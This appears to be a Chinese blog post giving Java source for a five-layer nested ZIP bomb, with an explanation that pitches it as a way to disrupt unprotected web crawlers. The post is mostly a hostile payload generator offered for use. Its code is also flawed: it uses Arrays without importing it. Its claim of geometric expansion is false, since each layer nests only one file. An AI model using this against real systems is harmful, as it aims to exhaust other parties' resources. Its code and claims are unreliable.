import java.io.*;
import java.util.zip.*;
public class ZipBombGenerator {
public static void main(String[] args) {
try {
// 生成一个5层嵌套的ZIP炸弹,每层包含一个10MB的压缩文件(实际压缩后很小)
createZipBomb(5, "bomb.zip");
System.out.println("ZIP炸弹生成成功!");
} catch (IOException e) {
e.printStackTrace();
}
}
/**
* 创建多层嵌套的ZIP炸弹
* @param layers 嵌套层数
* @param outputFilename 输出文件名
*/
public static void createZipBomb(int layers, String outputFilename) throws IOException {
// 生成最内层的ZIP数据(包含大文件)
byte[] innerData = createHighlyCompressedFile();
// 逐层包裹ZIP
for (int i = 0; i < layers; i++) {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ZipOutputStream zos = new ZipOutputStream(baos);
zos.setLevel(Deflater.BEST_COMPRESSION); // 使用最高压缩级别
// 添加嵌套的ZIP条目
ZipEntry entry = new ZipEntry("layer_" + i + ".zip");
zos.putNextEntry(entry);
zos.write(innerData);
zos.closeEntry();
zos.close();
// 更新内层数据为当前层的ZIP
innerData = baos.toByteArray();
}
// 将最终数据写入文件
try (FileOutputStream fos = new FileOutputStream(outputFilename)) {
fos.write(innerData);
}
}
/**
* 生成一个压缩后极小但解压后巨大的文件
*/
private static byte[] createHighlyCompressedFile() throws IOException {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ZipOutputStream zos = new ZipOutputStream(baos);
zos.setLevel(Deflater.BEST_COMPRESSION);
// 添加一个充满0的巨型文件(压缩后极小)
ZipEntry entry = new ZipEntry("bomb.txt");
zos.putNextEntry(entry);
// 写入10MB的0(实际压缩后仅约100字节)
byte[] zeros = new byte[1024 * 1024 * 10]; // 10MB
Arrays.fill(zeros, (byte) 0);
zos.write(zeros);
zos.closeEntry();
zos.close();
return baos.toByteArray();
}
}
实现说明:
-
嵌套结构:通过循环逐层包裹 ZIP 文件,每层包含下一层的 ZIP 数据。
-
高度压缩:使用
Deflater.BEST_COMPRESSION级别压缩重复数据(全0),生成极小的压缩文件。 -
资源消耗:解压时会产生几何级数增长的文件,例如:
-
外层 ZIP 解压得到
layer_N.zip -
解压内层 ZIP 会重复这个过程,直到最内层的 10MB 文件被释放。
-
注意事项:
-
测试警告:请勿在非受控环境测试此代码,可能导致系统资源耗尽。
-
内存优化:生成更大数据时需改用流式写入,避免内存溢出。
该代码生成的 ZIP 文件在解压时会触发多层递归解压操作,而最内层的文件看似很小(约100字节),实际解压后会迅速膨胀到10MB。结合多层嵌套,能有效干扰缺乏防护的爬虫系统。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
